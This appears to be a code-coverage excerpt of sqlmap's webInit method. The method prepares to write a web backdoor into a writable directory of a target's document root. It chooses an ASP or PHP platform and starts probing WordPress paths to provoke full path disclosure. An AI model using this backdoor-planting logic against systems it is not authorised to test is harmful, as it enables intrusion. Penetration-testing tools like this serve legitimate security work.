This method is used to write a web backdoor (agent) on a writable remote directory within the web server document root.
(self)
| 165 | return page |
| 166 | |
| 167 | def webInit(self): |
| 168 | """ |
| 169 | This method is used to write a web backdoor (agent) on a writable |
| 170 | remote directory within the web server document root. |
| 171 | """ |
| 172 | |
| 173 | if self.webBackdoorUrl is not None and self.webStagerUrl is not None and self.webPlatform is not None: |
| 174 | return |
| 175 | |
| 176 | self.checkDbmsOs() |
| 177 | |
| 178 | default = None |
| 179 | choices = list(getPublicTypeMembers(WEB_PLATFORM, True)) |
| 180 | |
| 181 | for ext in choices: |
| 182 | if conf.url.endswith(ext): |
| 183 | default = ext |
| 184 | break |
| 185 | |
| 186 | if not default: |
| 187 | default = WEB_PLATFORM.ASP if Backend.isOs(OS.WINDOWS) else WEB_PLATFORM.PHP |
| 188 | |
| 189 | message = "which web application language does the web server " |
| 190 | message += "support?\n" |
| 191 | |
| 192 | for count in xrange(len(choices)): |
| 193 | ext = choices[count] |
| 194 | message += "[%d] %s%s\n" % (count + 1, ext.upper(), (" (default)" if default == ext else "")) |
| 195 | |
| 196 | if default == ext: |
| 197 | default = count + 1 |
| 198 | |
| 199 | message = message[:-1] |
| 200 | |
| 201 | while True: |
| 202 | choice = readInput(message, default=str(default)) |
| 203 | |
| 204 | if not isDigit(choice): |
| 205 | logger.warning("invalid value, only digits are allowed") |
| 206 | |
| 207 | elif int(choice) < 1 or int(choice) > len(choices): |
| 208 | logger.warning("invalid value, it must be between 1 and %d" % len(choices)) |
| 209 | |
| 210 | else: |
| 211 | self.webPlatform = choices[int(choice) - 1] |
| 212 | break |
| 213 | |
| 214 | if not kb.absFilePaths: |
| 215 | message = "do you want sqlmap to further try to " |
| 216 | message += "provoke the full path disclosure? [Y/n] " |
| 217 | |
| 218 | if readInput(message, default='Y', boolean=True): |
| 219 | headers = {} |
| 220 | been = set([conf.url]) |
| 221 | |
| 222 | for match in re.finditer(r"=['\"]((https?):)?(//[^/'\"]+)?(/[\w/.-]*)\bwp-", kb.originalPage or "", re.I): |
| 223 | url = "%s%s" % (conf.url.replace(conf.path, match.group(4)), "wp-content/wp-db.php") |
| 224 | if url not in been: |
no test coverage detected